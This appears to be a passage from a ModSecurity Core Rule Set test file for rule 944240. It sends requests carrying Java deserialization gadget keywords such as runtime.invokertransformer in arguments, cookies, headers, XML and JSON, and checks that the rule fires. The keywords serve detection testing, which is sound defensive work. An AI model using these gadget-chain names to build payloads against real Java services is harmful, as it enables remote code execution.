Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-1 - desc: "Argument name includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.clonetransformer=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-2 - desc: "Cookie test includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.clonetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-3 - desc: "Cookie name includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.clonetransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-4 - desc: "Request header test includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.clonetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-5 - desc: "XML attribute value includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-6 - desc: "XML element value includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-7 - desc: "Nested XML element value includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-8 - desc: "Content-Type text/plain includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-9 - desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.clonetransformer\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-10 - desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-11 - desc: "Argument test includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-12 - desc: "Argument name includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.forclosure=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-13 - desc: "Cookie test includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.forclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-14 - desc: "Cookie name includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.forclosure=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-15 - desc: "Request header test includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.forclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-16 - desc: "XML attribute value includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-17 - desc: "XML element value includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-18 - desc: "Nested XML element value includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-19 - desc: "Content-Type text/plain includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-20 - desc: "Content-Type application/json arg value includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.forclosure\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-21 - desc: "Content-Type application/json arg name includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.forclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-22 - desc: "Argument test includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-23 - desc: "Argument name includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatefactory=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-24 - desc: "Cookie test includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-25 - desc: "Cookie name includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatefactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-26 - desc: "Request header test includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-27 - desc: "XML attribute value includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-28 - desc: "XML element value includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-29 - desc: "Nested XML element value includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-30 - desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-31 - desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatefactory\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-32 - desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-33 - desc: "Argument test includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-34 - desc: "Argument name includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-35 - desc: "Cookie test includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-36 - desc: "Cookie name includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatetransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-37 - desc: "Request header test includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-38 - desc: "XML attribute value includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-39 - desc: "XML element value includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-40 - desc: "Nested XML element value includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-41 - desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-42 - desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatetransformer\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-43 - desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-44 - desc: "Argument test includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-45 - desc: "Argument name includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.invokertransformer=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-46 - desc: "Cookie test includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 